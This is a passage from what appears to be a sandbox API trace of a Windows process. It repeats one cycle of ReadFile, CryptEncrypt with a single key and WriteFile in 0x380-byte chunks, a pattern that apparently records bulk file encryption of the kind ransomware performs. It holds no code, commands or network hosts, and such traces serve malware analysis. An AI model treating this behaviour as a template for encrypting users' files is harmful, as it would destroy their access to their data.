hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.082] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.082] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.083] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.083] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.084] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.084] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.085] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.085] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.086] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.086] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.087] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.087] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.088] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] ReadFile (in: 